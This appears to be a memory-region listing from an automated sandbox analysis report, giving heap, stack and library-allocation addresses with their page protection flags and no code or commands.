23CBC3E2000
|
heap
|
page read and write
|
||
|
23CBC1C7000
|
heap
|
page read and write
|
||
|
23CBA379000
|
heap
|
page read and write
|
||
|
23CBC20F000
|
heap
|
page read and write
|
||
|
23CBC224000
|
heap
|
page read and write
|
||
|
23CBA2C9000
|
heap
|
page read and write
|
||
|
24975A7A000
|
heap
|
page read and write
|
||
|
23CBC40B000
|
heap
|
page read and write
|
||
|
7FFE7EAA0000
|
trusted library allocation
|
page read and write
|
||
|
23CBC293000
|
heap
|
page read and write
|
||
|
23CBC2EE000
|
heap
|
page read and write
|
||
|
23CBC19A000
|
heap
|
page read and write
|
||
|
23CBC19D000
|
heap
|
page read and write
|
||
|
23CBC1FB000
|
heap
|
page read and write
|
||
|
212DA380000
|
heap
|
page read and write
|
||
|
23CBC5B7000
|
heap
|
page read and write
|
||
|
7FFE7EAB0000
|
trusted library allocation
|
page read and write
|
||
|
2497609A000
|
heap
|
page read and write
|
||
|
23CBC3B5000
|
heap
|
page read and write
|
||
|
23CBC5CF000
|
heap
|
page read and write
|
||
|
249004F5000
|
trusted library allocation
|
page read and write
|
||
|
23CBC40E000
|
heap
|
page read and write
|
||
|
7FFE7E7EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
24901DDF000
|
trusted library allocation
|
page read and write
|
||
|
24900485000
|
trusted library allocation
|
page read and write
|
||
|
24901F46000
|
trusted library allocation
|
page read and write
|
||
|
23CBC3BD000
|
heap
|
page read and write
|
||
|
23CBA2F4000
|
heap
|
page read and write
|
||
|
23CBC35B000
|
heap
|
page read and write
|
||
|
23CBC224000
|
heap
|
page read and write
|
||
|
23CBC1A1000
|
heap
|
page read and write
|
||
|
24974086000
|
heap
|
page read and write
|
||
|
249743B0000
|
heap
|
page read and write
|
||
|
7FFE7EA70000
|
trusted library allocation
|
page read and write
|
||
|
212DA620000
|
heap
|
page read and write
|
||
|
23CBC181000
|
heap
|
page read and write
|
||
|
7FFE7E790000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7EA10000
|
trusted library allocation
|
page read and write
|
||
|
23CBA565000
|
heap
|
page read and write
|
||
|
7FFE7EAE0000
|
trusted library allocation
|
page read and write
|
||
|
23CBC192000
|
heap
|
page read and write
|
||
|
7D0AEFF000
|
stack
|
page read and write
|
||
|
23CBC207000
|
heap
|
page read and write
|
||
|
23CBC18C000
|
heap
|
page read and write
|
||
|
24976049000
|
heap
|
page read and write
|
||
|
23CBA2E9000
|
heap
|
page read and write
|
||
|
7FFE7E980000
|
trusted library allocation
|
page execute and read and write
|
||
|
23CBC224000
|
heap
|
page read and write
|
||
|
23CBC32C000
|
heap
|
page read and write
|
||
|
23CBA2C0000
|
heap
|
page read and write
|
||
|
2497403D000
|
heap
|
page read and write
|
||
|
7FFE7EA40000
|
trusted library allocation
|
page read and write
|
||
|
D9932BF000
|
stack
|
page read and write
|
||
|
23CBC341000
|
heap
|
page read and write
|
||
|
23CBC413000
|
heap
|
page read and write
|
||
|
23CBC1B6000
|
heap
|
page read and write
|
||
|
24973FD0000
|
heap
|
page read and write
|
||
|
23CBC203000
|
heap
|
page read and write
|
||
|
23CBC366000
|
heap
|
page read and write
|
||
|
7FFE7E840000
|
trusted library allocation
|
page read and write
|
||
|
23CBC443000
|
heap
|
page read and write
|
||
|
B8AF6FF000
|
stack
|
page read and write
|
||
|
23CBC1C2000
|
heap
|
page read and write
|
||
|
23CBC336000
|
heap
|
page read and write
|
||
|
23CBC637000
|
heap
|
page read and write
|
||
|
23CBC2F2000
|
heap
|
page read and write
|
||
|
23CBC30E000
|
heap
|
page read and write
|
||
|
212DA450000
|
heap
|
page read and write
|
||
|
24975BA5000
|
heap
|
page read and write
|
||
|
7FFE7E846000
|
trusted library allocation
|
page read and write
|
||
|
24975AC0000
|
heap
|
page execute and read and write
|
||
|
23CBC5C4000
|
heap
|
page read and write
|
||
|
212DA3B0000
|
heap
|
page read and write
|
||
|
23CBC1A4000
|
heap
|
page read and write
|
||
|
249760C1000
|
heap
|
page read and write
|
||
|
212DA3B5000
|
heap
|
page read and write
|
||
|
23CBC2B4000
|
heap
|
page read and write
|
||
|
23CBBE30000
|
heap
|
page read and write
|
||
|
23CBC1CF000
|
heap
|
page read and write
|
||
|
23CBC41E000
|
heap
|
page read and write
|
||
|
7FFE7E930000
|
trusted library allocation
|
page read and write
|
||
|
249008E6000
|
trusted library allocation
|
page read and write
|
||
|
249020F6000
|
trusted library allocation
|
page read and write
|
||
|
23CBC30E000
|
heap
|
page read and write
|
||
|
23CBC281000
|
heap
|
page read and write
|
||
|
23CBC1E8000
|
heap
|
page read and write
|
||
|
23CBA367000
|
heap
|
page read and write
|
||
|
249102F9000
|
trusted library allocation
|
page read and write
|
||
|
23CBC214000
|
heap
|
page read and write
|
||
|
7FFE7E9E0000
|
trusted library allocation
|
page read and write
|
||
|
23CBC43E000
|
heap
|
page read and write
|
||
|
23CBC30E000
|
heap
|
page read and write
|
||
|
249762F9000
|
heap
|
page read and write
|
||
|
7FFE7EA20000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E876000
|
trusted library allocation
|
page execute and read and write
|
||
|
212DA45A000
|
heap
|
page read and write
|
||
|
23CBC1CA000
|
heap
|
page read and write
|
||
|
23CBC35B000
|
heap
|
page read and write
|
||
|
7FFE7E950000
|
trusted library allocation
|
page execute and read and write
|
||
|
23CBA260000
|
heap
|
page read and write
|
||
|
23CBC580000
|
heap
|
page read and write
|
||
|
23CBC1DF000
|
heap
|
page read and write
|
||
|
23CBC191000
|
heap
|
page read and write
|
||
|
23CBC1B9000
|
heap
|
page read and write
|
||
|
23CBC1B6000
|
heap
|
page read and write
|
||
|
23CBC293000
|
heap
|
page read and write
|
||
|
D9930BF000
|
stack
|
page read and write
|
||
|
23CBC298000
|
heap
|
page read and write
|
||
|
23CBC1AA000
|
heap
|
page read and write
|
||
|
7D0B3FE000
|
stack
|
page read and write
|
||
|
D993079000
|
stack
|
page read and write
|
||
|
23CBC3DD000
|
heap
|
page read and write
|
||
|
23CBC44D000
|
heap
|
page read and write
|
||
|
23CBC1B5000
|
heap
|
page read and write
|
||
|
7FFE7E9B0000
|
trusted library allocation
|
page read and write
|
||
|
23CBC42B000
|
heap
|
page read and write
|
||
|
23CBC2F2000
|
heap
|
page read and write
|
||
|
D993238000
|
stack
|
page read and write
|
||
|
23CBC336000
|
heap
|
page read and write
|
||
|
24974082000
|
heap
|
page read and write
|
||
|
23CBC354000
|
heap
|
page read and write
|
||
|
23CBA560000
|
heap
|
page read and write
|
||
|
23CBC228000
|
heap
|
page read and write
|
||
|
7D0B5FB000
|
stack
|
page read and write
|
||
|
7D0AFFB000
|
stack
|
page read and write
|
||
|
23CBC357000
|
heap
|
page read and write
|
||
|
23CBC1EB000
|
heap
|
page read and write
|
||
|
23CBC5D5000
|
heap
|
page read and write
|
||
|
23CBC1CB000
|
heap
|
page read and write
|
||
|
23CBC341000
|
heap
|
page read and write
|
||
|
24901DDB000
|
trusted library allocation
|
page read and write
|
||
|
23CBC3E2000
|
heap
|
page read and write
|
||
|
23CBC35E000
|
heap
|
page read and write
|
||
|
24976170000
|
heap
|
page read and write
|
||
|
23CBC2EE000
|
heap
|
page read and write
|
||
|
23CBC30E000
|
heap
|
page read and write
|
||
|
249004F1000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7EA80000
|
trusted library allocation
|
page read and write
|
||
|
23CBC5BD000
|
heap
|
page read and write
|
||
|
23CBC336000
|
heap
|
page read and write
|
||
|
212DA3C0000
|
heap
|
page read and write
|
||
|
7FFE7E7A0000
|
trusted library allocation
|
page read and write
|
||
|
24973F90000
|
heap
|
page read and write
|
||
|
23CBC217000
|
heap
|
page read and write
|
||
|
23CBC200000
|
heap
|
page read and write
|
||
|
23CBC720000
|
heap
|
page read and write
|
||
|
23CBC1B1000
|
heap
|
page read and write
|
||
|
23CBC5A1000
|
heap
|
page read and write
|
||
|
2497627C000
|
heap
|
page read and write
|
||
|
23CBC195000
|
heap
|
page read and write
|
||
|
2490047B000
|
trusted library allocation
|
page read and write
|
||
|
23CBC30E000
|
heap
|
page read and write
|
||
|
24900227000
|
trusted library allocation
|
page read and write
|
||
|
23CBC20C000
|
heap
|
page read and write
|
||
|
23CBC1A4000
|
heap
|
page read and write
|
||
|
23CBC821000
|
heap
|
page read and write
|
||
|
23CBC2ED000
|
heap
|
page read and write
|
||
|
23CBC1A2000
|
heap
|
page read and write
|
||
|
7DF466A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
23CBC2EE000
|
heap
|
page read and write
|
||
|
23CBC226000
|
heap
|
page read and write
|
||
|
24910070000
|
trusted library allocation
|
page read and write
|
||
|
23CBC34F000
|
heap
|
page read and write
|
||
|
24975A00000
|
trusted library allocation
|
page read and write
|
||
|
23CBC3B0000
|
heap
|
page read and write
|
||
|
23CBC41B000
|
heap
|
page read and write
|
||
|
23CBC5CF000
|
heap
|
page read and write
|
||
|
23CBA3A1000
|
heap
|
page read and write
|
||
|
249759D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7EA30000
|
trusted library allocation
|
page read and write
|
||
|
24973F60000
|
heap
|
page read and write
|
||
|
23CBA2E8000
|
heap
|
page read and write
|
||
|
23CBC822000
|
heap
|
page read and write
|
||
|
23CBC5AD000
|
heap
|
page read and write
|
There are 451 hidden memdumps, click here to show them.